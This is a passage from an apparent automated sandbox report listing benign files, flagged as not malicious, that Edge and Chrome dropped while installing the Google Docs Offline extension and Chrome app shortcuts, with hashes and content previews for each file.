SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.751992630887702
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
MD5:	250C48F4915DD4C0DFA7E7E021A4F066
SHA1:	092A98BF40D8C18280393BF3811A7DFA9A9FD326
SHA-256:	26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
SHA-512:	8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417833205646285
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
MD5:	236D2DD305D64C2B6ABD232ED53270DF
SHA1:	9F6885E95FBC4213631F0B0EA49C803D07D34136
SHA-256:	2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
SHA-512:	B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3777)
Category:	dropped
Size (bytes):	98880
Entropy (8bit):	5.414989230634404
Encrypted:	false
SSDEEP:	1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
MD5:	DC93A1045D1AD8D7ADD06B93B2FE79E2
SHA1:	CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
SHA-256:	D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
SHA-512:	025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3782)
Category:	dropped
Size (bytes):	107677
Entropy (8bit):	5.396220758526552
Encrypted:	false
SSDEEP:	1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
MD5:	E8015AC436B33034EDF7DA060E853A04
SHA1:	62D0F6EB0E441158A1F56F6E0C70D3D229B57886
SHA-256:	23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
SHA-512:	C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\f007b5f9-5c99-4437-9910-bdb91a320770.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 09:33:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.974742658400851
Encrypted:	false
SSDEEP:	48:8CdqCoTKCs+pHGidAKZdA19ehwiZUklqeh6y+3:87vm5y
MD5:	93FE534FC32259E1BBDC57137F8CA6F1
SHA1:	032A0959304761DF7837A4E64EC7C0C1F5F0FCDC
SHA-256:	A8CC67A64FBB4460151DFE35FAF852084259C0DE30D29843A97402C9DD130749
SHA-512:	DB5F79F06FC2C6FD81C45A01E0888D6331625B4CB235A17E20824D64C67CB344C8B5B91A2D9EFE98F6493CBC840FEC242616FF9A9AD1653041A413E80F0F4B15
Malicious:	false
Preview:	L..................F.@.. ...$+.,....-.v.%?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY6T...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 09:33:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.988480941719627
Encrypted:	false
SSDEEP:	48:8odqCoTKCs+pHGidAKZdA1weh/iZUkAQkqehpy+2:85vk9Q8y
MD5:	7B15183FFE8549CE3786F96F28D90420
SHA1:	0305C66B876121278B4D0E20BF199D503F0CF46F
SHA-256:	AF0987B0B85A59B174055D5542B74852850B2D2DFA3C4DFC3789A22C70D5140D
SHA-512:	DC21C12CEB9160428608017B66F8A6B939D336FCBA878923AE801F001557AAF8473BA1F078440896FF660286BEA478B90F0CFCCEE7897CC62E728A46336D9C98
Malicious:	false
Preview:	L..................F.@.. ...$+.,......m.%?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY6T...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0017642222828895
Encrypted:	false
SSDEEP:	48:8xXdqCoTKCs+sHGidAKZdA14tseh7sFiZUkmgqeh7sTy+BX:8xMvrnFy
MD5:	9EBDE07DC88ABD6151945CA41AA10226
SHA1:	1EC6981E575CB37134380B7736076076FD76626D
SHA-256:	A13489208F4128CCE59F5A61F6F6905F35016BAF29A4EBF9A81E022C8E6C494D
SHA-512:	F7A4D31AB6D0FE963EC5AF39BE5C8DB6667A6DFE0133E9D771621C561CF3E139E54F61204F0231AB6060F353F30914DCEB4B9CF980A274A68003F7C0A7105E9F
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 09:33:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9870140707291597
Encrypted:	false
SSDEEP:	48:8hdqCoTKCs+pHGidAKZdA1vehDiZUkwqeh9y+R:8Ovvry
MD5:	3106B8139BFED3B1BCAB4F9F88F90BD1
